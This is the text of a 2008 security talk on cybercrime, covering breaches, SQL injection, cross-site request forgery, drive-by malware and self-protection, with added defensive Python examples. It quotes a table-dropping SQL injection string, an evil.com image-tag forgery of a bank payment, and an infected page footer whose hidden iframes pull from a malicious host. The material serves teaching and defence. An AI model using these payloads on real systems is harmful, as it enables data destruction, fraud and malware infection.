
Protecting the World from Cybercrime

Neil Daswani, http://www.neildaswani.com

August 27, 2008

Overview

• Data breaches
• Hacking / Web application vulnerabilities
• What can software developers do?
• Malware distribution
• What is Google doing?
• What can you do to protect yourself?

Is the sky falling?

• TJX (March 2007)
  – owns TJ Maxx, Marshalls, and other dept stores
  – over 45 million credit card (CC) #s dating back to 2002
  – attacks exploited WEP used at branches

• Department of Veterans Affairs (August 2006)
  – Unisys (sub-contractor) took equipment home / burglarized
  – Name, DOB, SSN, address, insurance for 26.5M veterans
  – Employee dismissed, supervisor resigned

• CardSystems (June 2005)
  – credit card payment processing company: out of business
  – 43 million CC #s stored unencrypted / compromised
  – 263,000 CC #s stolen from database via SQL Injection

Data Breaches

Over 230 million lost or stolen customer records since 2005. How did that happen?

[Chart: breakdown of lost or stolen records by cause: Hacking, Stolen Equipment, Lost Equipment]

Source: privacyrights.org

What do you mean “hacking?”

Normal query: the user types a username & password into the web browser; the web server splices that input into a query and sends it to the database:

SELECT passwd FROM USERS
WHERE uname IS '$username'

Malicious query: the attacker provides the “username & password” input instead, so the web server sends the database:

SELECT passwd FROM USERS
WHERE uname IS ''; DROP TABLE USERS; -- '

Eliminates all user accounts.

http://xkcd.com/327/
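The two queries above, side by side in runnable form. This is an added example, not code from the talk: it builds the slide's query by string splicing (the vulnerable form) and with a bound parameter (the fix), and runs both against a constructed in-memory SQLite table using the slide's injected username. The spliced text is handed to the database as a script because that is what a driver that allows stacked statements does; the comparison is spelled with `=` because SQLite, like standard SQL, reserves `IS` for NULL tests.

```python
import sqlite3

# Constructed sample input: the username from the slide's malicious query.
MALICIOUS_USERNAME = "'; DROP TABLE USERS; -- "


def fresh_db():
    """In-memory USERS table holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (uname TEXT PRIMARY KEY, passwd TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('alice', 'ilovebob')")
    conn.commit()
    return conn


def table_exists(conn, name):
    """True if a table of that name is still in the schema."""
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def build_vulnerable_query(username):
    """The slide's query, built by splicing untrusted text into SQL."""
    return "SELECT passwd FROM USERS WHERE uname = '%s'" % username


def vulnerable_lookup(conn, username):
    """Vulnerable: the spliced string is executed as a script, so every statement
    the input smuggled in runs as well. Returns whether USERS survived."""
    conn.executescript(build_vulnerable_query(username))
    return table_exists(conn, "USERS")


def safe_lookup(conn, username):
    """Hardened: the value is bound as a parameter; the driver never parses it
    as SQL, so quotes and semicolons in it are just characters in a string."""
    return conn.execute(
        "SELECT passwd FROM USERS WHERE uname = ?", (username,)
    ).fetchone()


def demo():
    """Run both forms against the injected username and report what happened."""
    results = {}
    conn = fresh_db()
    results["vulnerable_sql"] = build_vulnerable_query(MALICIOUS_USERNAME)
    results["vulnerable_table_survives"] = vulnerable_lookup(conn, MALICIOUS_USERNAME)

    conn = fresh_db()
    results["parameterized_row"] = safe_lookup(conn, MALICIOUS_USERNAME)
    results["parameterized_table_survives"] = table_exists(conn, "USERS")
    results["legit_row"] = safe_lookup(conn, "alice")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

With the spliced query the table is gone after one lookup; with the bound parameter the same input simply matches no user and the schema is untouched. Parameter binding is the fix; escaping quotes by hand is not, because the escaping rules differ per database and are easy to get wrong.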

Cross-Site Request Forgery (XSRF)

Attack scenario: Alice is using a (“good”) web application:

www.bank.com

(assume user is logged in w/ cookie)

At the same time (i.e. same browser session), she’s also visiting a “malicious” web application:

www.evil.com

XSRF (normal session)

Alice → bank.com: /login.html
Alice → bank.com: /auth uname=alice&pass=ilovebob
bank.com → Alice: sets Cookie: sessionid=40a4c04de
Alice → bank.com: /viewbalance, Cookie: sessionid=40a4c04de
bank.com → Alice: “Your balance is $25,000”

XSRF (attack)

Alice → bank.com: /login.html
Alice → bank.com: /auth uname=alice&pass=ilovebob
bank.com → Alice: sets Cookie: sessionid=40a4c04de
Alice → evil.com: /evil.html
evil.com → Alice: <IMG SRC=http://bank.com/paybill?addr=123 evil st & amt=$10000>
Alice's browser → bank.com: /paybill?addr=123 evil st, amt=$10000, Cookie: sessionid=40a4c04de
bank.com → Alice: “OK. Payment Sent!”
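What bank.com's /paybill handler should have done with the forged request above. This is an added example, not code from the talk: a hardened handler, written as plain Python functions with a constructed in-memory session store (the session id is the one on the slides; the user, balance and token names are assumptions). The handler refuses the GET that the <IMG> tag triggers and requires a per-session anti-forgery token that only bank.com's own form can carry.

```python
import hmac
import secrets

# Constructed in-memory session store keyed by session id.
SESSIONS = {"40a4c04de": {"user": "alice", "balance": 25000, "csrf_token": None}}


def issue_form_token(session_id):
    """Mint a random anti-forgery token, remember it in the session and return it
    for bank.com to embed in its own pay-bill form. A page on evil.com cannot
    read bank.com's form (same-origin policy), so it never learns the token."""
    token = secrets.token_hex(16)
    SESSIONS[session_id]["csrf_token"] = token
    return token


def handle_paybill(method, cookies, params):
    """Hardened /paybill handler. Returns an (HTTP status, message) pair."""
    session = SESSIONS.get(cookies.get("sessionid"))
    if session is None:
        return 401, "Not logged in"
    # A state-changing action must not be reachable through a plain GET,
    # which is exactly what the <IMG SRC=...> on evil.html makes the browser send.
    if method != "POST":
        return 405, "Use POST"
    # The cookie only proves that Alice's browser sent the request; the token
    # proves the request originated from bank.com's own form.
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "Missing or invalid anti-forgery token"
    try:
        amount = int(params.get("amt", ""))
    except ValueError:
        return 400, "Bad amount"
    if amount <= 0 or amount > session["balance"]:
        return 400, "Bad amount"
    session["balance"] -= amount
    return 200, "OK. Payment Sent!"


def demo():
    """Replay the slide's forged request against the hardened handler, then a legitimate one."""
    SESSIONS["40a4c04de"].update(balance=25000, csrf_token=None)
    cookies = {"sessionid": "40a4c04de"}  # the browser attaches this in every case
    forged_get = handle_paybill("GET", cookies, {"addr": "123 evil st", "amt": "10000"})
    # A cross-site request that is not a GET still carries the cookie but not the token.
    forged_post = handle_paybill("POST", cookies, {"addr": "123 evil st", "amt": "10000"})
    token = issue_form_token("40a4c04de")
    legit = handle_paybill("POST", cookies,
                           {"addr": "power co", "amt": "100", "csrf_token": token})
    return {"forged_get": forged_get, "forged_post": forged_post,
            "legit": legit, "balance": SESSIONS["40a4c04de"]["balance"]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The token check is what actually stops the forgery; the POST-only rule removes the cheapest delivery vehicle (an image tag) and is worth having on its own. Modern browsers add a third layer, the SameSite cookie attribute, which keeps the session cookie off cross-site requests altogether, but a server-side token remains the control the application itself can verify.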

What can the software community do?

Software Developers:
• Arm / educate yourself! (e.g., www.learnsecurity.com)
• Elect a security czar for each project

Managers:
• Instrument development process for security
• Organize for security (advisors, satellites, etc)
• Invest in training!

Secure Development Lifecycle

Source: Software Security, Gary McGraw, ISBN 0-321-35670-6

Malware

• Logs keystrokes (including passwords)
• Joins a botnet
• Sends email spam from your machine
• Other countless bad things...

<!--Copyright Information --> <div align=’center’class=’copyright’>Powered by <a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final&copy;2003&nbsp; <a href=’http://www.invisionpower.com’>IPS,Inc.</a></div><iframe src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe> <iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>

Malware Distribution

• Old style: email, peer-to-peer, etc
• New style: infect web pages & drive-by-downloads
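The infected footer shown two slides back is the sort of thing a site owner should be able to spot in their own pages. As an added example (not code from the talk or from Google), here is a small scanner that parses a page with Python's standard HTML parser and reports every iframe that loads content from a host other than the site's own, noting whether it is also sized or styled to be invisible. The sample page is the slide's injected footer; the infected site's own hostname is an assumed placeholder, since the slide does not name it.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed placeholder for the infected site's own hostname.
SITE_HOST = "forum.example"

# Constructed sample: the injected footer from the slide.
INFECTED_FOOTER = """<!--Copyright Information --> <div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final&copy;2003&nbsp;
<a href='http://www.invisionpower.com'>IPS,Inc.</a></div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lower-cases tag names for us
            self.iframes.append({k: (v or "") for k, v in attrs})


def looks_hidden(attrs):
    """Zero-size or display:none frames are the usual shape of an injected loader."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


def suspicious_iframes(html, site_host):
    """Return every iframe whose src points at a host other than the site's own.
    Relative and same-host frames are skipped; each hit records src, host and
    whether the frame is hidden."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if host and host != site_host.lower():
            hits.append({"src": src, "host": host, "hidden": looks_hidden(attrs)})
    return hits


if __name__ == "__main__":
    for hit in suspicious_iframes(INFECTED_FOOTER, SITE_HOST):
        print("external iframe:", hit["src"], "(hidden)" if hit["hidden"] else "")
```

Run over the slide's footer this reports both frames on the unfamiliar host. An external iframe is not proof of infection on its own (ad networks use them too), so treat a hit as a trigger for comparing the served page against the deployed source, and keep the check in a cron job or post-deploy test rather than running it once.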

Building Botnets with SQL Injection

1. Attacker → Search Engine: query for vulnerable sites
2. Attacker → Target Site(s): inject malicious JavaScript/ActiveX
3. User → Target Site(s): view page
4. User gets infected: drive-by-download
5. Attacker → infected machine: “What do you want to do today?” Log keystrokes, DoS, etc.

“This site may harm your computer”

Really! We're not kidding!

How does Google do that?

Uses Google's search index and distributed systems

Social Engineering

• BREAKING NEWS: Abortion outlawed in California
• How to save money on gas
• Millions of credit card numbers stolen from bank database, find out if you are affected
• Google launches free music downloads in China
• Jerry Yang relinquishes control over Yahoo
• McCain gives up fighting for presidency
• US Dollar hits 6-year high, further gains expected

Next-Generation Phishing + Malware

What can you do to protect yourself?

• Change default router password. Use WPA.
• Use a personal firewall. Always keep ON.
• Use good anti-virus. (e.g. pack.google.com)
• Install patches immediately. Use auto-update.
• Make backups or use backup service.
• Use browser with malware & phishing protection (e.g. Firefox 3).

What can you do to protect yourself?

• Don't install software you don't trust.
• Use bookmarks for financial sites (or Google).
• Check for SSL / HTTPS for important sites.
• Don't ignore security warnings.
• Use good passwords and reset questions.
• Use a credit card with a threshold limit.
• Consider virtual, one-time credit cards.
• If it sounds too good to be true, it probably is!

Summary

• What can software people do? Learn, organize, prevent, etc
• What is Google doing? Protecting you while you search & browse
• What can you do? Be vigilant!

Acknowledgements

Amit Patel, Arkajit Dey, and the “Jedis” on Google's Security Team